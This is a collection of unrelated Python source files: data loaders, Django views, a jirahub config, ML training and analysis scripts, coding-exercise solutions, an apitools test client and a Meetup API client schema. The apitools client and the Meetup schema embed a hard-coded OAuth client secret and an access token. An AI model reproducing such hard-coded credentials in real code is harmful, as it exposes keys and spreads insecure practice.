return {'code': -1000,
'error': msg}
try:
# Read in the lines from the file
with open(one_file, 'r') as in_file:
reader = csv.DictReader(in_file)
files_loaded.append(one_file)
for row in reader:
centroid_lonlat = [row['lon'], row['lat']]
time_fmt = row['dp_time']
timestamp = row['timestamp']
dp_metadata = {
"source": row['source'],
"value": row['value']
}
trait = row['trait']
__internal__.create_datapoint_with_dependencies(transformer.args.clowder_url, transformer.args.clowder_key,
trait, (centroid_lonlat[1], centroid_lonlat[0]), time_fmt,
time_fmt, dp_metadata, timestamp)
lines_read += 1
except Exception:
logging.exception("Error reading CSV file '%s'. Continuing processing", os.path.basename(one_file))
error_count += 1
if files_csv <= 0:
logging.info("No CSV files were found in the list of files to process")
if error_count > 0:
logging.error("Errors were found during processing")
return {'code': -1001, 'error': "Too many errors occurred during processing. Please correct and try again"}
return {
'code': 0,
configuration.TRANSFORMER_NAME: {
'version': configuration.TRANSFORMER_VERSION,
'utc_timestamp': datetime.datetime.utcnow().isoformat(),
'processing_time': str(datetime.datetime.now() - start_timestamp),
'num_files_received': str(files_count),
'num_csv_files': str(files_csv),
'lines_loaded': str(lines_read),
'files_processed': str(files_loaded)
}
}
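# Illustrative examples (the URL is a placeholder): get_geostreams_api_url() always
# routes through the 'api/geostreams' particle and never returns a trailing slash.
#   __internal__.get_geostreams_api_url('https://example.org/clowder', 'sensors')
#   # -> 'https://example.org/clowder/api/geostreams/sensors'
#   __internal__.get_geostreams_api_url('https://example.org/clowder', ('datapoints', 'bulk'))
#   # -> 'https://example.org/clowder/api/geostreams/datapoints/bulk'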
|
from hujan_ui.maas import load_document
from hujan_ui.maas.exceptions import MAASError
import requests
import json
import sweetify
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from hujan_ui.maas.utils import MAAS
from .forms import AddDomainForm, EditDomainForm
@login_required
def index(request):
try:
if settings.WITH_EX_RESPONSE:
domains = load_document('domains.json')
else:
maas = MAAS()
domains = maas.get("domains/").json()
machine_file = open("hujan_ui/maas/ex_response/domains.json", "w")
json.dump(domains, machine_file)
machine_file.close()
context = {
'title': 'DNS',
'domains': domains,
'menu_active': 'domains',
}
except (MAASError, ConnectionError, TimeoutError) as e:
sweetify.sweetalert(request, 'Warning', text=str(e), button='OK', timer=5000)
context = None
return render(request, 'maas/dns/index.html', context)
@login_required
def add(request):
form = AddDomainForm(request.POST or None)
if form.is_valid():
try:
resp = form.save()
if resp.status_code == requests.codes.ok:
sweetify.sweetalert(request, icon='success', text=_('Successfully added domain'), button='Ok', timer=2000)
return redirect("maas:dns:index")
            sweetify.warning(request, _('An error occurred'), button='Ok', timer=2000)
except (MAASError, ConnectionError, TimeoutError) as e:
sweetify.sweetalert(request, 'Warning', text=str(e), button='Ok', timer=5000)
context = {
'title': 'Add Domain',
'menu_active': 'domains',
'form': form,
'title_submit': 'Save Domain',
'col_size': '4'
}
return render(request, 'maas/form.html', context)
@login_required
def edit(request, id):
try:
maas = MAAS()
domain = maas.get(f"domains/{id}/").json()
form = EditDomainForm(request.POST or None, initial=domain)
if form.is_valid():
resp = form.save(domain['id'])
if resp.status_code in maas.ok:
sweetify.sweetalert(request, 'Success', text=_('Successfully edited domain'), button='Ok', timer=2000)
return redirect("maas:dns:index")
sweetify.warning(request, _(resp.text), button='Ok', timer=2000)
context = {
'title': 'Edit Domain',
'menu_active': 'domains',
'form': form,
'title_submit': 'Save Domain',
'col_size': '4'
}
except (MAASError, ConnectionError, TimeoutError) as e:
sweetify.sweetalert(request, 'Warning', text=str(e), button='Ok', timer=5000)
context = None
return render(request, 'maas/form.html', context)
@login_required
def delete(request, id):
try:
maas = MAAS()
resp = maas.delete(f"domains/{id}/")
if resp.status_code in maas.ok:
sweetify.sweetalert(request, 'Success', icon='success', text=_('Successfully deleted domain'), button='Ok', timer=2000)
else:
sweetify.sweetalert(request, 'Warning', icon='warning', text=_(resp.text), button='Ok', timer=2000)
except (MAASError, ConnectionError, TimeoutError) as e:
sweetify.sweetalert(request, 'Warning', text=str(e), button='Ok', timer=5000, icon='error')
return redirect("maas:dns:index")
|
# This config contains custom settings for all keys
import re
def before_update_hook(updated_issue, updated_issue_fields, other_issue, other_issue_fields):
pass
c.before_issue_update.append(before_update_hook)
c.jira.server = "https://test.jira.server"
c.jira.project_key = "TEST"
c.jira.github_issue_url_field_id = 12345
c.jira.jirahub_metadata_field_id = 67890
c.jira.closed_statuses = ["Closed", "Done"]
c.jira.close_status = "Done"
c.jira.reopen_status = "Ready"
c.jira.open_status = "Open"
c.jira.max_retries = 5
c.jira.notify_watchers = False
c.jira.issue_filter = lambda issue: True
c.jira.sync_comments = True
c.jira.sync_status = True
c.jira.sync_labels = True
c.jira.sync_milestones = True
c.jira.create_tracking_comment = True
c.jira.issue_title_formatter = lambda issue, title: "From GitHub: " + title
c.jira.issue_body_formatter = lambda issue, body: "Check out this great GitHub issue:\n\n" + body
c.jira.comment_body_formatter = lambda issue, comment, body: "Check out this great GitHub comment:\n\n" + body
c.jira.redact_patterns.append(re.compile(r"(?<=secret GitHub data: ).+?\b"))
def jira_issue_create_hook(issue, fields):
fields["issue_type"] = "Bug"
return fields
c.jira.before_issue_create.append(jira_issue_create_hook)
c.github.repository = "testing/test-repo"
c.github.max_retries = 10
c.github.issue_filter = lambda _: True
c.github.sync_comments = True
c.github.sync_status = True
c.github.sync_labels = True
c.github.sync_milestones = True
c.github.create_tracking_comment = True
c.github.issue_title_formatter = lambda issue, title: "From JIRA: " + title
c.github.issue_body_formatter = lambda issue, body: "Check out this great JIRA issue:\n\n" + body
c.github.comment_body_formatter = lambda issue, comment, body: "Check out this great JIRA comment:\n\n" + body
c.github.redact_patterns.append(re.compile(r"(?<=secret JIRA data: ).+?\b"))
def github_issue_create_hook(_, fields):
fields["labels"] = ["jirahub"]
return fields
c.github.before_issue_create.append(github_issue_create_hook)
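# Illustrative note (not part of the config): the formatters above simply prefix the
# mirrored title, e.g.
#   c.jira.issue_title_formatter(None, "Crash on startup")
#   # -> "From GitHub: Crash on startup"
# and the redact patterns blank out whatever follows "secret GitHub data: " or
# "secret JIRA data: " in synced text.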
|
import warnings
warnings.filterwarnings("ignore")
import os
import argparse
import numpy as np
import pandas as pd
from tqdm import tqdm
from multiprocessing import cpu_count
from sklearn.model_selection import train_test_split
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torch.utils.data.sampler import RandomSampler
from steel_dataset import SteelDataset
from utils import seed_everything, get_transforms, get_model, get_loss, do_kaggle_metric
parser = argparse.ArgumentParser(description='')
parser.add_argument('--model', default='Res34Unetv4', type=str, help='Model version')
parser.add_argument('--n_classes', default=4, type=int, help='Number of classes')
parser.add_argument('--loss', default='BCEWithLogitsLoss', type=str, help='Loss function')
parser.add_argument('--fine_size', default=256, type=int, help='Resized image size')
parser.add_argument('--pad_left', default=13, type=int, help='Left padding size')
parser.add_argument('--pad_right', default=14, type=int, help='Right padding size')
parser.add_argument('--batch_size', default=2, type=int, help='Batch size for training')
parser.add_argument('--epoch', default=300, type=int, help='Number of training epochs')
parser.add_argument('--snapshot', default=5, type=int, help='Number of snapshots per fold')
parser.add_argument('--cuda', default=True, type=bool, help='Use cuda to train model')
parser.add_argument('--save_weight', default='weights', type=str, help='weight save space')
parser.add_argument('--max_lr', default=0.01, type=float, help='max learning rate')
parser.add_argument('--min_lr', default=0.001, type=float, help='min learning rate')
parser.add_argument('--momentum', default=0.9, type=float, help='momentum for SGD')
parser.add_argument('--weight_decay', default=1e-4, type=float, help='Weight decay for SGD')
args = parser.parse_args()
fine_size = args.fine_size + args.pad_left + args.pad_right
args.weight_name = 'model_' + str(fine_size) + '_' + args.model
if not os.path.isdir(args.save_weight):
os.mkdir(args.save_weight)
device = torch.device('cuda' if args.cuda else 'cpu')
train_df = pd.read_csv(os.path.join('..', 'input', 'preprocessed_train.csv'))
def test(test_loader, model, criterion):
running_loss = 0.0
precisions = []
model.eval()
for inputs, masks in tqdm(test_loader):
inputs, masks = inputs.to(device), masks.to(device)
with torch.set_grad_enabled(False):
outputs = model(inputs)
loss = criterion(outputs, masks)
predicts = F.sigmoid(outputs).detach().cpu().numpy().squeeze()
truths = masks.detach().cpu().numpy().squeeze()
running_loss += loss.item() * inputs.size(0)
precisions.append(do_kaggle_metric(predicts, truths))
precision = np.mean(precisions)
    epoch_loss = running_loss / len(val_data)
return epoch_loss, precision
def train(train_loader, model, criterion):
running_loss = 0.0
    data_size = len(train_data)
model.train()
for inputs, masks in tqdm(train_loader):
inputs, masks = inputs.to(device), masks.to(device)
optimizer.zero_grad()
with torch.set_grad_enabled(True):
logits= model(inputs)
loss = criterion(logits, masks)
loss.backward()
optimizer.step()
running_loss += loss.item() * inputs.size(0)
epoch_loss = running_loss / data_size
return epoch_loss
if __name__ == '__main__':
seed_everything(43)
scheduler_step = args.epoch // args.snapshot
# Get Model
steel = get_model(args.model, args.n_classes)
steel.to(device)
# Setup optimizer
optimizer = torch.optim.SGD(
steel.parameters(),
lr=args.max_lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
optimizer,
scheduler_step,
args.min_lr)
train_idx, valid_idx, _, _ = train_test_split(
train_df.index,
train_df['split_label'],
test_size=0.2,
random_state=43)
train_data = SteelDataset(
train_df.iloc[train_idx],
mode='train',
fine_size=args.fine_size,
pad_left=args.pad_left,
pad_right=args.pad_right,
transforms=get_transforms())
train_loader = DataLoader(
train_data,
        sampler=RandomSampler(train_data),
batch_size=args.batch_size,
num_workers=0, #cpu_count(),
pin_memory=True)
val_data = SteelDataset(
train_df.iloc[valid_idx],
mode='valid',
fine_size=args.fine_size,
pad_left=args.pad_left,
pad_right=args.pad_right,
transforms=get_transforms())
val_loader = DataLoader(
val_data,
shuffle=False,
batch_size=args.batch_size,
num_workers=0, #cpu_count(),
pin_memory=True)
num_snapshot = 0
best_acc = 0
criterion = get_loss(args.loss)
for epoch in tqdm(range(args.epoch)):
train_loss = train(train_loader, steel, criterion)
val_loss, accuracy = test(val_loader, steel, criterion)
lr_scheduler.step()
if accuracy > best_acc:
best_acc = accuracy
best_param = steel.state_dict()
if (epoch + 1) % scheduler_step == 0:
torch.save(
best_param,
os.path.join(args.save_weight, args.weight_name + str(num_snapshot) + '.pth'))
optimizer = torch.optim.SGD(
steel.parameters(),
lr=args.max_lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
optimizer,
scheduler_step,
args.min_lr)
num_snapshot += 1
best_acc = 0
print('epoch: {} train_loss: {:.3f} val_loss: {:.3f} val_accuracy: {:.3f}'.format(epoch + 1, train_loss,
val_loss, accuracy))
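# Note on the schedule above (descriptive only): training is split into `snapshot`
# cycles of `epoch // snapshot` epochs each; at the end of every cycle the
# best-scoring weights of that cycle are written to disk and the SGD optimizer and
# cosine-annealing scheduler are re-created, restarting the learning rate at
# `max_lr` for the next snapshot.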
|
# Problem 1: Merge Two Sorted Lists
# Merge two sorted linked lists and return it as a new sorted list.
# The new list should be made by splicing together the nodes of the first two lists.
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution(object):
def mergeTwoLists(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
# Merge two sorted linked lists and return it as a new sorted list.
# The new list should be made by splicing together the nodes of the first two lists.
if not l1:
return l2
elif not l2:
return l1
elif l1 and l2:
if l1.val > l2.val:
l1, l2 = l2, l1
if l1.next:
return ListNode(l1.val, self.mergeTwoLists(l1.next, l2))
else:
return ListNode(l1.val, l2)
# Problem 2: Decode String
def decodeString(s):
"""
:type s: str
:rtype: str
"""
# Given an encoded string, return its decoded string.
# The encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is guaranteed to be a positive integer.
# You may assume that the input string is always valid
# No extra white spaces, square brackets are well-formed, etc.
# Furthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. For example, there won't be input like 3a or 2[4].
    # Decode with a stack: digits build the current repeat count, '[' pushes the
    # decoded prefix together with that count, and ']' pops and repeats the segment
    # collected since the matching '['. This handles nesting and multi-digit k.
    decoded = ""
    count = 0
    stack = []
    for char in s:
        if char.isdigit():
            count = count * 10 + int(char)
        elif char == "[":
            stack.append((decoded, count))
            decoded = ""
            count = 0
        elif char == "]":
            prefix, repeat_times = stack.pop()
            decoded = prefix + decoded * repeat_times
        else:
            decoded = decoded + char
    print(decoded)
    return decoded
decodeString("3[a]2[bc]")
decodeString("3[a2[c]]")
|
from .customstockenv import CustomStockEnv
class CustomStockEnvDefault(CustomStockEnv):
def __init__(self, data, config):
super(CustomStockEnvDefault, self).__init__(data, config)
self.prediction = False
def _predict_response(self, data):
print("Incorrect flow. Cannot predict for this env...")
exit()
|
import re
import textwrap
def justify_text(_text, w, align="left", fill=" "):
wrapper = textwrap.TextWrapper(width=w)
dedented_text = textwrap.dedent(text=_text)
txt = wrapper.fill(text=dedented_text)
def justify_both(get_text, _width):
prev_txt = get_text
while((l := _width-len(get_text)) > 0):
get_text = re.sub(r"(\s+)", r"\1 ", get_text, count=l)
if(get_text == prev_txt):
break
return get_text.rjust(_width)
_justify_res = ""
if align == 'left':
for l in txt.splitlines():
_justify_res += l.ljust(w, fill)+"\n"
elif align == 'right':
for l in txt.splitlines():
_justify_res += l.rjust(w, fill)+"\n"
elif align == 'center':
for l in txt.splitlines():
_justify_res += l.center(w, fill)+"\n"
elif align == 'justify':
for l in txt.splitlines():
_justify_res += justify_both(l, w)+"\n"
return _justify_res
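# Usage sketch (the sample sentence is illustrative): wrap to 30 columns, then pad
# or space-fill every line to the full width.
if __name__ == "__main__":
    sample = "The quick brown fox jumps over the lazy dog near the river bank."
    print(justify_text(sample, 30, align="justify"))
    print(justify_text(sample, 30, align="center", fill="."))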
|
from common.tflogs2pandas import tflog2pandas
import pickle
import hashlib
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from common.gym_interface import template
with open("output_data/jobs_vanilla4.pickle", "rb") as f:
jobs = pickle.load(f)
read_cache = True
try:
if not read_cache:
raise Exception("read raw data")
vanilla4_results = pd.read_pickle("output_data/tmp/vanilla4_results")
vanilla4_results_full = pd.read_pickle("output_data/tmp/vanilla4_results_full")
except Exception as e:
results = []
dfs = []
for idx, job in jobs.items():
ret = job.copy()
str_bodies = "-".join([str(x) for x in job["vanilla_bodies"]])
str_md5 = hashlib.md5(job["custom_alignment"].encode()).hexdigest()
seed = job["seed"]
path = f"output_data/tensorboard_vanilla/model-{str_bodies}-CustomAlignWrapper-md{str_md5}-sd{seed}/PPO_1"
print(f"Loading {path}")
df = tflog2pandas(path)
df = df[df["metric"].str.startswith("eval/")]
max_value_399 = df[df["metric"]=="eval/399_mean_reward"]["value"].max()
max_value_499 = df[df["metric"]=="eval/499_mean_reward"]["value"].max()
max_value_599 = df[df["metric"]=="eval/599_mean_reward"]["value"].max()
max_value_699 = df[df["metric"]=="eval/699_mean_reward"]["value"].max()
print(max_value_399)
ret["path"] = path
ret["max_value_399"] = max_value_399
ret["max_value_499"] = max_value_499
ret["max_value_599"] = max_value_599
ret["max_value_699"] = max_value_699
results.append(ret)
df["str_md5"] = str_md5
df["seed"] = seed
dfs.append(df)
vanilla4_results = pd.DataFrame(results)
vanilla4_results.to_pickle("output_data/tmp/vanilla4_results")
vanilla4_results_full = pd.concat(dfs, ignore_index=True)
vanilla4_results_full.to_pickle("output_data/tmp/vanilla4_results_full")
bodies = [399,499,599,699]
for body in bodies:
vanilla4_results[f"rank_{body}"] = vanilla4_results[f"max_value_{body}"].rank()
A = vanilla4_results["max_value_399"]
B = vanilla4_results["max_value_499"]
C = vanilla4_results["max_value_599"]
D = vanilla4_results["max_value_699"]
vanilla4_results["combined_value"] = 2*A + B + C + 0.5*D
vanilla4_results["combined_rank"] = vanilla4_results["combined_value"].rank()
vanilla4_results = vanilla4_results.sort_values(by="combined_rank", ascending=False)
print(vanilla4_results.head(10))
print(vanilla4_results.tail(10))
fig, axes = plt.subplots(ncols=2, nrows=2, sharey=True)
axes = axes.flatten()
for ax, body in zip(axes,bodies):
g = sns.histplot(data=vanilla4_results, x=f"max_value_{body}", ax=ax)
g.set(xlabel="Max Value")
g.set_title(template(body))
plt.tight_layout()
plt.savefig("output_data/plots/distribution_vanilla4_500_exps.png")
plt.close()
plt.figure()
g = sns.histplot(data=vanilla4_results, x="combined_value")
g.set(xlabel="Combined Value = 2A + B + C + 0.5D")
plt.savefig("output_data/plots/distribution_vanilla4_combined.png")
plt.close()
print("The best alignment:")
print(vanilla4_results.iloc[0]["custom_alignment"])
print("The worst alignment:")
print(vanilla4_results.iloc[-1]["custom_alignment"])
|
#!/usr/bin/env python
"""Apply the DESITrIP CNN classifier to observed spectra,
chosen by tile ID and date.
"""
from desispec.io import read_spectra, write_spectra
from desispec.spectra import Spectra
from desitarget.cmx.cmx_targetmask import cmx_mask
from desitrip.preproc import rebin_flux, rescale_flux
from astropy.io import fits
from astropy.table import Table, vstack, hstack
from glob import glob
from datetime import date
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import os
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from tensorflow import keras
p = ArgumentParser(description='DESITrIP data processing',
formatter_class=ArgumentDefaultsHelpFormatter)
p.add_argument('--tile', type=int, default=0,
help='Tile ID for processing.')
p.add_argument('--date', default=date.today().strftime('%Y%m%d'),
help='Date of observation [YYYYMMDD]')
p.add_argument('--tfmodel', default=None,
help='TensorFlow model HDF5 definition')
args = p.parse_args()
# Access redux folder.
redux='/global/project/projectdirs/desi/spectro/redux/daily/tiles'
prefix_in='/'.join([redux, '{:05d}'.format(args.tile), args.date])
if not os.path.isdir(prefix_in):
raise SystemExit('{} does not exist.'.format(prefix_in))
# Set up BGS target bit selection.
cmx_bgs_bits = '|'.join([_ for _ in cmx_mask.names() if 'BGS' in _])
# List zbest and coadd files.
zbfiles = sorted(glob('{}/zbest*.fits'.format(prefix_in)))
cafiles = sorted(glob('{}/coadd*.fits'.format(prefix_in)))
if args.tfmodel is not None:
classifier = keras.models.load_model(args.tfmodel)
# Loop through zbest and coadd files for each petal.
# Extract the fibermaps, ZBEST tables, and spectra.
# Keep only BGS targets passing basic event selection.
allzbest = None
allfmap = None
allwave = None
allflux = None
allivar = None
allmask = None
allres = None
for cafile, zbfile in zip(cafiles, zbfiles):
# Access data per petal.
zbest = Table.read(zbfile, 'ZBEST')
fibermap = Table.read(zbfile, 'FIBERMAP')
pspectra = read_spectra(cafile)
# Apply standard event selection.
isTGT = fibermap['OBJTYPE'] == 'TGT'
isGAL = zbest['SPECTYPE'] == 'GALAXY'
isBGS = fibermap['CMX_TARGET'] & cmx_mask.mask(cmx_bgs_bits) != 0
select = isTGT & isGAL & isBGS
# Accumulate spectrum data.
if allzbest is None:
allzbest = zbest[select]
allfmap = fibermap[select]
allwave = pspectra.wave['brz']
allflux = pspectra.flux['brz'][select]
allivar = pspectra.ivar['brz'][select]
allmask = pspectra.mask['brz'][select]
allres = pspectra.resolution_data['brz'][select]
else:
allzbest = vstack([allzbest, zbest[select]])
allfmap = vstack([allfmap, fibermap[select]])
allflux = np.vstack([allflux, pspectra.flux['brz'][select]])
allivar = np.vstack([allivar, pspectra.ivar['brz'][select]])
allmask = np.vstack([allmask, pspectra.mask['brz'][select]])
allres = np.vstack([allres, pspectra.resolution_data['brz'][select]])
# Apply the DESITrIP preprocessing to selected spectra.
rewave, reflux, reivar = rebin_flux(allwave, allflux, allivar, allzbest['Z'],
minwave=2500., maxwave=9500., nbins=150,
log=True, clip=True)
rsflux = rescale_flux(reflux)
# Run the classification.
if args.tfmodel is not None:
pred = classifier.predict(rsflux)
# Create output: selected target spectra.
selected_spectra = Spectra(bands=['brz'],
wave={'brz' : allwave},
flux={'brz' : allflux},
ivar={'brz' : allivar},
mask={'brz' : allmask},
resolution_data={'brz' : allres},
fibermap=allfmap)
write_spectra('selected-{}-{}.fits'.format(args.tile, args.date), selected_spectra)
# Append preprocess spectra to output.
hx = fits.HDUList()
hdu_rewave = fits.PrimaryHDU(rewave)
hdu_rewave.header['EXTNAME'] = 'REWAVE'
hdu_rewave.header['BUNIT'] = 'Angstrom'
hdu_rewave.header['AIRORVAC'] = ('vac', 'Vacuum wavelengths')
hx.append(hdu_rewave)
hdu_reflux = fits.ImageHDU(reflux)
hdu_reflux.header['EXTNAME'] = 'REFLUX'
hx.append(hdu_reflux)
hdu_rsflux = fits.ImageHDU(rsflux)
hdu_rsflux.header['EXTNAME'] = 'RSFLUX'
hx.append(hdu_rsflux)
if args.tfmodel is not None:
    hdu_classify = fits.ImageHDU(pred)
    hdu_classify.header['EXTNAME'] = 'OBJCLASS'
    hx.append(hdu_classify)
hx.append(fits.BinTableHDU(allzbest))
hx.writeto('reduced-{}-{}.fits'.format(args.tile, args.date), overwrite=True)
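# Usage sketch (tile, date and model path are placeholders; the script's file name
# is whatever this module is saved as):
#   python <this_script>.py --tile 70500 --date 20200315 --tfmodel /path/to/model.h5
# This writes selected-<tile>-<date>.fits with the BGS spectra passing the cuts and
# reduced-<tile>-<date>.fits with the rebinned/rescaled fluxes and CNN predictions.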
|
from django.core.management.base import BaseCommand
from elasticsearch import Elasticsearch
from create_lesson_plan.models import IndexDocument
class Command(BaseCommand):
def get_body(self, pk):
query_body ={
"query": {
"bool": {
"must": [
{"match": {
"pk": pk
}}
]
}
},
"_source": ["link", "pk"]
}
return query_body
def handle(self, *args, **options):
all_index = IndexDocument.objects.all()
es = Elasticsearch()
counter = 0
for each in all_index.iterator():
query_body = self.get_body(each.pk)
results = es.search(index="offline_content", body=query_body)
if(len(results["hits"]["hits"]) > 0):
res = results["hits"]["hits"][0]["_source"]
if(res["link"] != each.link):
counter += 1
print(counter)
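# Usage sketch: run as a Django management command (the command name is this file's
# name under management/commands/), e.g. `python manage.py <command_name>`. It
# prints a running count of IndexDocument rows whose stored link disagrees with the
# matching document in the 'offline_content' Elasticsearch index.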
|
#
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Modified generated client library for fusiontables version v1.
This is a hand-customized and pruned version of the fusiontables v1
client, designed for use in testing.
"""
from apitools.base.py import base_api
from apitools.base.py.testing.testclient import fusiontables_v1_messages
class FusiontablesV1(base_api.BaseApiClient):
"""Generated client library for service fusiontables version v1."""
MESSAGES_MODULE = fusiontables_v1_messages
_PACKAGE = u'fusiontables'
_SCOPES = [u'https://www.googleapis.com/auth/fusiontables',
u'https://www.googleapis.com/auth/fusiontables.readonly']
_VERSION = u'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = ''
_CLIENT_CLASS_NAME = u'FusiontablesV1'
_URL_VERSION = u'v1'
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new fusiontables handle."""
url = url or u'https://www.googleapis.com/fusiontables/v1/'
super(FusiontablesV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.column = self.ColumnService(self)
self.columnalternate = self.ColumnAlternateService(self)
class ColumnService(base_api.BaseApiService):
"""Service class for the column resource."""
_NAME = u'column'
def __init__(self, client):
super(FusiontablesV1.ColumnService, self).__init__(client)
self._method_configs = {
'List': base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'fusiontables.column.list',
ordered_params=[u'tableId'],
path_params=[u'tableId'],
query_params=[u'maxResults', u'pageToken'],
relative_path=u'tables/{tableId}/columns',
request_field='',
request_type_name=u'FusiontablesColumnListRequest',
response_type_name=u'ColumnList',
supports_download=False,
),
}
self._upload_configs = {
}
def List(self, request, global_params=None):
"""Retrieves a list of columns.
Args:
request: (FusiontablesColumnListRequest) input message
global_params: (StandardQueryParameters, default: None) global
arguments
Returns:
(ColumnList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
class ColumnAlternateService(base_api.BaseApiService):
"""Service class for the column resource."""
_NAME = u'columnalternate'
def __init__(self, client):
super(FusiontablesV1.ColumnAlternateService, self).__init__(client)
self._method_configs = {
'List': base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'fusiontables.column.listalternate',
ordered_params=[u'tableId'],
path_params=[u'tableId'],
query_params=[u'maxResults', u'pageToken'],
relative_path=u'tables/{tableId}/columns',
request_field='',
request_type_name=(
u'FusiontablesColumnListAlternateRequest'),
response_type_name=u'ColumnListAlternate',
supports_download=False,
),
}
self._upload_configs = {
}
def List(self, request, global_params=None):
"""Retrieves a list of columns.
Args:
request: (FusiontablesColumnListRequest) input message
global_params: (StandardQueryParameters, default: None) global
arguments
Returns:
(ColumnList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
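# Usage sketch (the table id is a placeholder; this assumes the pruned
# fusiontables_v1_messages module defines FusiontablesColumnListRequest with a
# tableId field, as the method config above implies):
#   client = FusiontablesV1(get_credentials=False)
#   request = fusiontables_v1_messages.FusiontablesColumnListRequest(tableId='1Abc')
#   columns = client.column.List(request)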
|
__author__ = 'rcj1492'
__created__ = '2015.06'
class meetupHandler(object):
''' handles responses from meetup api and usage data'''
_class_fields = {
'schema': {
'rate_limits': [
{'requests': 30, 'period': 10}
]
}
}
def __init__(self, usage_client=None):
''' initialization method for meetup handler class
:param usage_client: callable that records usage data
'''
# construct class field model
from jsonmodel.validators import jsonModel
self.fields = jsonModel(self._class_fields)
# construct initial methods
self.rate_limits = self.fields.schema['rate_limits']
self.usage_client = usage_client
def handle(self, response):
# construct default response details
details = {
'method': response.request.method,
'code': response.status_code,
'url': response.url,
'error': '',
'json': None,
'headers': response.headers
}
# rate limit headers:
# https://www.meetup.com/meetup_api/docs/#limits
# X-RateLimit-Limit
# X-RateLimit-Remaining
# X-RateLimit-Reset
# handle different codes
if details['code'] == 200 or details['code'] == 201 or details['code'] == 202:
details['json'] = response.json()
else:
details['error'] = response.content.decode()
return details
class meetupRegister(object):
''' currently must be done manually '''
# https://secure.meetup.com/meetup_api/oauth_consumers/
def __init__(self, app_settings):
pass
def setup(self):
return self
def update(self):
return self
class meetupClient(object):
''' a class of methods for managing user events, groups and profile on Meetup API '''
# use labpack.authentication.oauth2.oauth2Client to obtain access token
_class_fields = {
'schema': {
'api_endpoint': 'https://api.meetup.com',
'access_token': '1350d78219f4dc9ded18c7fbda86a19e',
'service_scope': ['ageless'],
'requests_handler': 'labpack.handlers.requests.handle_requests',
'usage_client': 'labpack.storage.appdata.appdataClient.__init__',
'member_id': 12345678,
'group_url': 'myfavoritegroup',
'group_id': 23456789,
'event_id': 23454321,
'venue_id': 123456,
'max_results': 4,
'radius': 10.0,
'topics': [ 123 ],
'categories': [ 12 ],
'zip_code': '94203',
'city_name': 'Sacramento',
'country_code': 'US',
'longitude': 12.345678,
'latitude': 12.345679,
'text': 'favorite group',
'location': 'state capital building',
'membership_answers': [
{
'question_id': 1234567,
'answer_text': 'my name'
}
],
'exit_comment': 'better deal',
'attendance_answers': [
{
'question_id': 1234567,
'answer_text': 'my name'
}
],
'additional_guests': 0,
'payment_service': '',
'payment_code': ''
},
'components': {
'.service_scope': {
'unique_values': True
},
'.service_scope[0]': {
'discrete_values': ['ageless', 'basic', 'event_management', 'group_edit', 'group_content', 'group_join', 'profile_edit', 'reporting', 'rsvp']
},
'.topics[0]': {
'integer_data': True
},
'.categories[0]': {
'integer_data': True
},
'.max_results': {
'integer_data': True
},
'.member_id': {
'integer_data': True
},
'.event_id': {
'integer_data': True
},
'.group_id': {
'integer_data': True
},
'.venue_id': {
'integer_data': True
},
'.radius': {
'min_value': 0.0,
'max_value': 100.0
},
'.latitude': {
'min_value': -90.0,
'max_value': 90.0
},
'.longitude': {
                'min_value': -180.0,
                'max_value': 180.0
},
'.zip_code': {
'max_length': 5,
'min_length': 5,
'must_contain': [ '\\d{5}' ]
},
'.country_code': {
'max_length': 2,
'min_length': 2,
'must_contain': [ '[A-Z]{2}' ]
},
'.membership_answers[0].question_id': {
'integer_data': True
},
'.attendance_answers[0].question_id': {
'integer_data': True
},
'.additional_guests': {
'integer_data': True,
'min_value': 0
}
}
}
_class_objects = {
'profile_brief': {
'schema': {
'bio': '',
'city': '',
'country': '',
'id': '',
'joined': '',
'lang': '',
'lat': '',
'link': '',
'lon': '',
'name': '',
'photo_url': '',
'state': '',
'visited': '',
'zip': ''
}
},
'profile': {
'schema': {
'bio': '',
'birthday': {
'day': 0,
'month': 0,
'year': 0
},
'city': '',
'country': '',
'gender': '',
'group_profile': {},
'id': 0,
'joined': 0,
'last_event': {},
'lat': 0.0,
'localized_country_name': '',
'lon': 0.0,
'messaging_pref': '',
'name': '',
'next_event': {},
'other_services': {
'facebook': {'identifier': '', 'url': ''},
'linkedin': {'identifier': '', 'url': ''},
'twitter': {'identifier': '', 'url': ''}
},
'photo': {},
'privacy': {
'bio': '',
'groups': '',
'topics': '',
'facebook': ''
},
'self': {},
'state': '',
'stats': {
'groups': 0,
'rsvps': 0,
'topics': 0
},
'status': ''
},
'components': {
